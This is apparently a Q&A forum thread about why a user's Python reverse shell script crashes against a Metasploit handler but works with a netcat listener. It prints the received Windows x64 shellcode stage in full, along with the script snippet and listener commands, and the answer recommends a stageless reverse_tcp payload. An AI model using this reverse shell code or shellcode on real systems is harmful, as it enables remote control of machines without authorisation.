When using metasploit with my python reverse shell script I get a byte error, but it seems to work fine when using a netcat listener

Question

When I run my python script and use netcat -nvlp 4444 the connection establishes fine and I am able to use the functions.

When attempting to replicate this in metasploit I use set payload windows/x64/shell/reverse_tcp then I set the LHOST and LPORT and run the script on the victim machine. The connection establishes, but right after receiving Login: on my end, I get the error below.

I did some research and I think some bytes should be excluded such as the null ones but I am unsure if this is the issue or the correct way to fix the issue. One thing I am confused by is why pwd recieves anything if the script crashes before I have inputted the password.

When trying print(pwd) before decode:

b'P\x01\x00\x00' b'\xfcH\x83\xe4\xf0\xe8\xc0\x00\x00\x00AQAPRQVH1\xd2eH\x8bR`H\x8bR\x18H\x8bR H\x8brPH\x0f\xb7JJM1\xc9H1\xc0\xac<a|\x02, A\xc1\xc9\rA\x01\xc1\xe2\xedRAQH\x8bR \x8bB<H\x01\xd0\x8b\x80\x88\x00\x00\x00H\x85\xc0tgH\x01\xd0P\x8bH\x18D\x8b@ I\x01\xd0\xe3VH\xff\xc9A\x8b4\x88H\x01\xd6M1\xc9H1\xc0\xacA\xc1\xc9\rA\x01\xc18\xe0u\xf1L\x03L$\x08E9\xd1u\xd8XD\x8b@$I\x01\xd0fA\x8b\x0cHD\x8b@\x1cI\x01\xd0A\x8b\x04\x88H\x01\xd0AXAX^YZAXAYAZH\x83\xec AR\xff\xe0XAYZH\x8b\x12\xe9W\xff\xff\xff]I\xb8cmd\x00\x00\x00\x00\x00APAPH\x89\xe2WWWM1\xc0j\rYAP\xe2\xfcf\xc7D$T\x01\x01H\x8dD$\x18\xc6\x00hH\x89\xe6VPAPAPAPI\xff\xc0API\xff\xc8M\x89\xc1L\x89\xc1A\xbay\xcc?\x86\xff\xd5H1\xd2H\xff\xca\x8b\x0eA\xba\x08\x87\x1d`\xff\xd5\xbb\xf0\xb5\xa2VA\xba\xa6\x95\xbd\x9d\xff\xd5H\x83\xc4(<\x06|\n\x80\xfb\xe0u\x05\xbbG\x13roj\x00YA\x89\xda\xff\xd5' 

errors:

Traceback (most recent call last): File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 87, in <module> Login() File "C:\Users\13472\Desktop\folder\testh\testv5\testmod3Copy3.py", line 37, in Login pwd = pwd.decode("utf-8").strip() UnicodeDecodeError: 'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte 

code snippet:

passwd = "Anything" def Login(): global s while True: string1=("Login: ") string1=string1.encode("utf-8") s.send(string1) pwd = s.recv(1024) pwd = pwd.decode("utf-8") if pwd.strip() == passwd: break else: continue string2=("You are connected! ") string2=string2.encode("utf-8") s.send(string2) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) Login() 

Answer 1

I believe the payload you are setting up in the metasploit handler is a staged payload (more info: https://metasploit.help.rapid7.com/docs/working-with-payloads). This means that the Python script is receiving the final stage but does not know how to handle it and, thus, crashing.

Try doing the same thing, but using a stageless payload such as windows/x64/shell_reverse_tcp instead and see if it works.